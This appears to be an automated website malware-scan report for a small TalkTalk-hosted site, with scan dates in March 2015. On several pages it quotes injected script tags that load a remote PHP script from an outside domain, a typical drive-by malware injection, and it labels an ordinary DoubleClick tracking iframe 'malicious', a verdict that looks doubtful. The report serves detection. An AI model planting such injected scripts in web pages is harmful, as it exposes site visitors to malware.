Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=potstove.talktalk.net
Result: The website is marked by Google as suspicious - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.potstove.talktalk.net/ | 200 OK Content-Length: 2395 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=5245915"></script> | ||
http://www.potstove.talktalk.net/contact.htm | 200 OK Content-Length: 2140 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=5245912"></script> | ||
http://www.potstove.talktalk.net/index.htm | 200 OK Content-Length: 2395 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=5245915"></script> | ||
http://www.potstove.talktalk.net/diary.htm | 200 OK Content-Length: 3408 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=5245913"></script> | ||
http://www.potstove.talktalk.net/folk.htm | 200 OK Content-Length: 14586 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=5245914"></script> | ||
http://www.potstove.talktalk.net/../martin.nail/Folkmus.htm | HTTP/1.1 302 Found Connection: close Date: Mon, 02 Mar 2015 00:24:23 GMT Location: http://www.talktalk.co.uk/ Server: Apache Content-Length: 210 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.talktalk.co.uk/ | HTTP/1.1 302 Found Connection: close Date: Mon, 02 Mar 2015 00:24:24 GMT Location: http://sales.talktalk.co.uk/ Server: Apache/2.2.22 (Ubuntu) Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Set-Cookie: vCnt[hp]=1; expires=Tue, 01-Mar-2016 00:24:24 GMT Set-Cookie: COOKIETEST=1; domain=.tiscali.co.uk Set-Cookie: tiscalicustomsettings=colscheme%3D%26fontsize%3D%26group%3Dh18%26hpswitched%3D%26hpvisits%3D1%26hponnet%3D%26textonly%3D; expires=Tue, 01-Mar-2016 00:24:24 GMT; path=/; domain=.talktalk.co.uk Set-Cookie: ADRUM_BT=R%3A0%7CclientRequestGUID%3A585cc745-6bf8-4ade-bcb4-9e9aa2c883b38001; expires=Mon, 02-Mar-2015 00:24:54 GMT; path=/ | clean |
http://sales.talktalk.co.uk/ | HTTP/1.1 302 Found Cache-Control: private, must-revalidate, max-age=0 Connection: close Date: Mon, 02 Mar 2015 00:24:24 GMT Pragma: no-cache Location: https://sales.talktalk.co.uk/ Server: Apache/2.2.22 (Ubuntu) Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: sid=53om8svknjrng4ss7vg73endg292jfd4vql69ufq43tbunrd75a0; path=/; HttpOnly Set-Cookie: tiscalicustomsettings=colscheme%3D%26fontsize%3D%26group%3Dh18%26hpswitched%3D%26hpvisits%3D%26hponnet%3D%26textonly%3D; expires=Tue, 01-Mar-2016 00:24:24 GMT; path=/; domain=.talktalk.co.uk Set-Cookie: portalId=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/ Set-Cookie: portalId=TALKTALK; expires=Wed, 01-Apr-2015 00:24:24 GMT; path=/; domain=.talktalk.co.uk Set-Cookie: branchId=1231; expires=Wed, 01-Apr-2015 00:24:24 GMT; path=/ Set-Cookie: agentId=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/ | clean |
https://sales.talktalk.co.uk/ | 200 OK Content-Length: 191519 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var axel = Math.random() + ""; var a = axel * 10000000000000; document.write('<iframe src="https://4255905.fls.doubleclick.net/activityi;src=4255905;type=tt-home;cat=talkt976;ord=' + a + '?" width="1" height="1" frameborder="0" style="display:none"></iframe>'); Antivirus reports:
| ||
https://sales.talktalk.co.uk//m0.ttxm.co.uk/scripts/myaccount/main.js/ | 404 Not Found Content-Length: 39056 Content-Type: text/html | clean |
https://sales.talktalk.co.uk//m0.ttxm.co.uk/scripts/core-js-2014-09-12.js/ | 404 Not Found Content-Length: 39056 Content-Type: text/html | clean |
https://sales.talktalk.co.uk//m0.ttxm.co.uk/scripts/core-sales-js-2012-05-21.js/ | 404 Not Found Content-Length: 39056 Content-Type: text/html | clean |
https://sales.talktalk.co.uk//m0.ttxm.co.uk/scripts/header-core-javascript-20121207.js/ | 404 Not Found Content-Length: 39056 Content-Type: text/html | clean |
https://sales.talktalk.co.uk//m1.ttxm.co.uk/scripts/tt_tooltipWithIcon.js/ | 404 Not Found Content-Length: 39056 Content-Type: text/html | clean |
https://sales.talktalk.co.uk//m0.ttxm.co.uk/scripts/tagcanvas.js/ | 404 Not Found Content-Length: 39056 Content-Type: text/html | clean |
https://sales.talktalk.co.uk//m0.ttxm.co.uk/scripts/appdyn/adrum-sales.js/ | 404 Not Found Content-Length: 39056 Content-Type: text/html | clean |
https://sales.talktalk.co.uk//d3c3cq33003psk.cloudfront.net/opentag-30671-1060797.js/ | 404 Not Found Content-Length: 39056 Content-Type: text/html | clean |
https://sales.talktalk.co.uk//m0.ttxm.co.uk/scripts/webtagging-2014-02-13.js/ | 404 Not Found Content-Length: 39056 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: potstove.talktalk.net
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: potstove.talktalk.net
Referer: http://www.google.com/search?q=potstove.talktalk.net
Result:
The result is similar to the first query. There are no suspicious redirects found.